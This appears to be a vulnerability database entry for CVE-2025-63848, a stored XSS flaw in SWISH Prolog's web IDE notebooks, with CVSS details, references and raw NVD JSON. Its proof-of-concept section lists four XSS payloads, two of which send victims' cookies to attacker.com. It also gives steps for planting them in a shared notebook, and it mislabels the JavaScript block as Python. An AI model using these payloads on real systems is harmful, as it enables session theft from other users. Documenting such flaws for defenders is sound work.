CVE-2025-63848

Description

Stored cross site scripting (xss) vulnerability in SWISH prolog thru 2.2.0 allowing attackers to execute arbitrary code via crafted web IDE notebook.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:swi-prolog:swish:*:*:*:*:*:*:*:* - VULNERABLE

SWISH Prolog < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-63848 PoC - Stored XSS in SWISH Prolog Web IDE
// This PoC demonstrates the stored XSS vulnerability via crafted notebook

// Method 1: Using script tag
const pocScript = `
<html>
<body>
<script>alert(document.cookie)</script>
</body>
</html>
`;

// Method 2: Using event handlers
const pocEventHandler = `
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
`;

// Method 3: Using SVG element
const pocSvg = `
<svg onload="fetch('https://attacker.com/steal?data='+btoa(document.cookie))">
`;

// Method 4: Using iframe injection
const pocIframe = `
<iframe src="javascript:alert(document.domain)"></iframe>
`;

// To exploit: Create a new SWISH notebook and insert any of the above payloads
// into a notebook cell. When other users view the notebook, the XSS will trigger.

// Example attack scenario:
// 1. Attacker creates a SWISH notebook with malicious content
// 2. Notebook is saved and stored on the server
// 3. Victim views the attacker's notebook
// 4. Malicious JavaScript executes in victim's browser context
// 5. Attacker steals session cookies or performs actions as victim

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63848
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63848
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63848/
[4] VulDB https://vuldb.com/cve/CVE-2025-63848
[5] https://github.com/SWI-Prolog
[6] https://github.com/coderMohammed1/CVE-2025-63848

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63848", "sourceIdentifier": "[email protected]", "published": "2025-11-20T17:15:52.733", "lastModified": "2025-12-12T14:11:31.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored cross site scripting (xss) vulnerability in SWISH prolog thru 2.2.0 allowing attackers to execute arbitrary code via crafted web IDE notebook."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:swi-prolog:swish:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.2.0", "matchCriteriaId": "BC040331-B45A-42F0-8B1E-55BD16EEBCEF"}]}]}], "references": [{"url": "https://github.com/SWI-Prolog", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coderMohammed1/CVE-2025-63848", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}